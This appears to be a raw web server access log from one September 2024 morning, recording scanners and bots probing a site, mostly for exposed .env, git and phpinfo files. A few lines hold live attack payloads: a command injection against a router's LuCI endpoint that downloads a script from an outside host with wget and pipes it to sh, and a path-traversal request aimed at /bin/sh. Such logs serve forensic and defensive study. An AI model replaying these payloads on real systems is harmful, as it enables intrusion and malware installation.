179.43.133.242 - - [01/Sep/2024:03:09:04 +0200] "GET /backend/.env HTTP/1.1" 404 317 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:03:09:04 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:03:09:05 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:03:09:05 +0200] "GET /admin/.env HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
179.43.133.242 - - [01/Sep/2024:03:09:05 +0200] "GET /application/.env HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
154.216.17.140 - - [01/Sep/2024:03:12:14 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:12:14 +0200] "POST /local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
89.190.156.137 - - [01/Sep/2024:03:13:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.17.140 - - [01/Sep/2024:03:13:55 +0200] "GET /private/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:13:56 +0200] "POST /private/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
185.224.128.59 - - [01/Sep/2024:03:13:59 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
154.216.17.140 - - [01/Sep/2024:03:15:52 +0200] "GET /frontend_dev.php/$ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
141.98.11.173 - - [01/Sep/2024:03:17:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.173 - - [01/Sep/2024:03:20:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [01/Sep/2024:03:20:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
184.105.247.252 - - [01/Sep/2024:03:24:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
64.62.197.181 - - [01/Sep/2024:03:24:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
149.50.103.48 - - [01/Sep/2024:03:25:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.47 - - [01/Sep/2024:03:26:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [01/Sep/2024:03:27:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.59 - - [01/Sep/2024:03:29:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
89.190.156.137 - - [01/Sep/2024:03:30:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [01/Sep/2024:03:31:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [01/Sep/2024:03:32:23 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.17.140 - - [01/Sep/2024:03:33:21 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
149.50.103.48 - - [01/Sep/2024:03:34:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
191.96.150.90 - - [01/Sep/2024:03:37:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [01/Sep/2024:03:37:34 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [01/Sep/2024:03:37:35 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [01/Sep/2024:03:37:35 +0200] "GET /?%3Cplay%3Ewithme%3C/%3E HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
191.96.150.90 - - [01/Sep/2024:03:37:36 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [01/Sep/2024:03:37:37 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [01/Sep/2024:03:37:37 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
191.96.150.90 - - [01/Sep/2024:03:37:38 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
154.216.17.140 - - [01/Sep/2024:03:38:18 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
147.185.132.184 - - [01/Sep/2024:03:39:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.216.17.140 - - [01/Sep/2024:03:39:58 +0200] "GET /docker/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:39:58 +0200] "POST /docker/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
89.190.156.137 - - [01/Sep/2024:03:40:51 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.17.140 - - [01/Sep/2024:03:41:51 +0200] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:45:35 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:47:25 +0200] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:47:25 +0200] "POST /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
185.224.128.59 - - [01/Sep/2024:03:48:00 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
149.50.103.48 - - [01/Sep/2024:03:48:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [01/Sep/2024:03:48:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.224.128.84 - - [01/Sep/2024:03:48:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [01/Sep/2024:03:48:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.216.17.140 - - [01/Sep/2024:03:49:14 +0200] "GET /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:49:15 +0200] "POST /apps/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
54.37.10.247 - - [01/Sep/2024:03:50:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
89.190.156.137 - - [01/Sep/2024:03:51:49 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.17.140 - - [01/Sep/2024:03:52:56 +0200] "GET /live_env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:52:56 +0200] "POST /live_env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
89.190.156.137 - - [01/Sep/2024:03:53:32 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.17.140 - - [01/Sep/2024:03:54:58 +0200] "GET /.env.old HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:54:58 +0200] "POST /.env.old HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:55:03 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:56:48 +0200] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:56:49 +0200] "POST /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
184.105.139.70 - - [01/Sep/2024:03:57:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
141.98.11.173 - - [01/Sep/2024:03:58:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
154.216.17.140 - - [01/Sep/2024:03:59:06 +0200] "GET /.env.save HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:03:59:06 +0200] "POST /.env.save HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
199.45.154.138 - - [01/Sep/2024:03:59:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
199.45.154.138 - - [01/Sep/2024:03:59:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.138 - - [01/Sep/2024:03:59:44 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.138 - - [01/Sep/2024:03:59:45 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
89.190.156.137 - - [01/Sep/2024:04:01:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.17.140 - - [01/Sep/2024:04:01:23 +0200] "GET /admin-app/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:01:23 +0200] "POST /admin-app/.env HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
89.190.156.137 - - [01/Sep/2024:04:05:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.17.140 - - [01/Sep/2024:04:06:15 +0200] "GET /fedex/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:06:15 +0200] "POST /fedex/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:06:18 +0200] "GET /?phpinfo=1 HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:09:44 +0200] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:09:45 +0200] "POST /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:11:36 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:13:18 +0200] "GET /.env.dist HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:13:18 +0200] "POST /.env.dist HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
80.82.77.202 - - [01/Sep/2024:04:13:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; rv:68.0) Gecko/20100101 Firefox/68.0"
185.224.128.47 - - [01/Sep/2024:04:13:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
80.82.77.202 - - [01/Sep/2024:04:15:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; rv:68.0) Gecko/20100101 Firefox/68.0"
80.82.77.202 - - [01/Sep/2024:04:16:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; rv:68.0) Gecko/20100101 Firefox/68.0"
154.216.17.140 - - [01/Sep/2024:04:16:48 +0200] "GET /back/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:16:48 +0200] "POST /back/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
149.50.103.48 - - [01/Sep/2024:04:17:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.77.202 - - [01/Sep/2024:04:18:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; rv:68.0) Gecko/20100101 Firefox/68.0"
142.93.197.121 - - [01/Sep/2024:04:19:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; SM-N960F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
154.216.17.140 - - [01/Sep/2024:04:20:27 +0200] "GET /sources/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:20:27 +0200] "POST /sources/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
185.224.128.47 - - [01/Sep/2024:04:20:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
172.105.128.12 - - [01/Sep/2024:04:21:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
154.216.17.140 - - [01/Sep/2024:04:24:35 +0200] "GET /local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:24:35 +0200] "POST /local/.env HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
5.42.76.224 - - [01/Sep/2024:04:24:46 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
185.224.128.47 - - [01/Sep/2024:04:25:22 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
89.190.156.137 - - [01/Sep/2024:04:27:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
154.216.17.140 - - [01/Sep/2024:04:28:07 +0200] "GET /frontend_dev.php/$ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
149.50.103.48 - - [01/Sep/2024:04:28:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.216.149.37 - - [01/Sep/2024:04:28:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
154.216.17.140 - - [01/Sep/2024:04:30:12 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
170.64.157.159 - - [01/Sep/2024:04:32:57 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
149.50.103.48 - - [01/Sep/2024:04:33:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
142.93.197.121 - - [01/Sep/2024:04:34:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Mobile Safari/537.36 Edge/12.0"
154.216.17.140 - - [01/Sep/2024:04:36:35 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:40:19 +0200] "GET /.json HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
93.174.93.12 - - [01/Sep/2024:04:42:25 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [01/Sep/2024:04:42:47 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [01/Sep/2024:04:43:52 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
89.190.156.137 - - [01/Sep/2024:04:44:40 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
172.105.128.12 - - [01/Sep/2024:04:44:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
93.174.93.12 - - [01/Sep/2024:04:44:51 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
154.216.17.140 - - [01/Sep/2024:04:45:49 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
154.216.17.140 - - [01/Sep/2024:04:49:31 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"
167.71.48.228 - - [01/Sep/2024:04:50:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
167.71.48.228 - - [01/Sep/2024:04:50:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
167.71.48.228 - - [01/Sep/2024:04:50:55 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.71.48.228 - - [01/Sep/2024:04:50:55 +0200] "GET /odinhttpcall1725158455 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.71.48.228 - - [01/Sep/2024:04:50:55 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.71.48.228 - - [01/Sep/2024:04:50:55 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
167.71.48.228 - - [01/Sep/2024:04:50:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
167.71.48.228 - - [01/Sep/2024:04:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.227.171.205 - - [01/Sep/2024:04:50:55 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
164.90.178.150 - - [01/Sep/2024:04:50:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.225.107.32 - - [01/Sep/2024:04:50:55 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
164.90.210.55 - - [01/Sep/2024:04:50:55 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
165.232.68.246 - - [01/Sep/2024:04:50:55 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
159.65.125.100 - - [01/Sep/2024:04:50:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.90.178.150 - - [01/Sep/2024:04:50:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.232.68.246 - - [01/Sep/2024:04:50:55 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
164.90.178.150 - - [01/Sep/2024:04:50:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
89.190.156.137 - - [01/Sep/2024:04:51:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
52.76.71.100 - - [01/Sep/2024:04:52:33 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
134.209.243.222 - - [01/Sep/2024:04:54:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
134.209.243.222 - - [01/Sep/2024:04:54:14 +0200] "GET /odinhttpcall1725158655 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
134.209.243.222 - - [01/Sep/2024:04:54:14 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
134.209.243.222 - - [01/Sep/2024:04:54:14 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
134.209.243.222 - - [01/Sep/2024:04:54:14 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
134.209.243.222 - - [01/Sep/2024:04:54:14 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
134.209.243.222 - - [01/Sep/2024:04:54:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
134.209.243.222 - - [01/Sep/2024:04:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
165.227.171.176 - - [01/Sep/2024:04:54:15 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
68.183.68.147 - - [01/Sep/2024:04:54:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
165.227.171.205 - - [01/Sep/2024:04:54:15 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
164.90.220.56 - - [01/Sep/2024:04:54:15 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
164.90.210.55 - - [01/Sep/2024:04:54:15 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
164.90.220.56 - - [01/Sep/2024:04:54:15 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
165.232.68.246 - - [01/Sep/2024:04:54:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.232.68.246 - - [01/Sep/2024:04:54:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
165.232.68.246 - - [01/Sep/2024:04:54:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.156.68.104 - - [01/Sep/2024:04:55:27 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
94.156.68.104 - - [01/Sep/2024:04:55:29 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (SMART-TV; X11; Linux armv7l) AppleWebkit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42"
94.156.68.104 - - [01/Sep/2024:04:55:56 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
94.156.68.104 - - [01/Sep/2024:04:56:05 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; Android 9; G8341) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36"
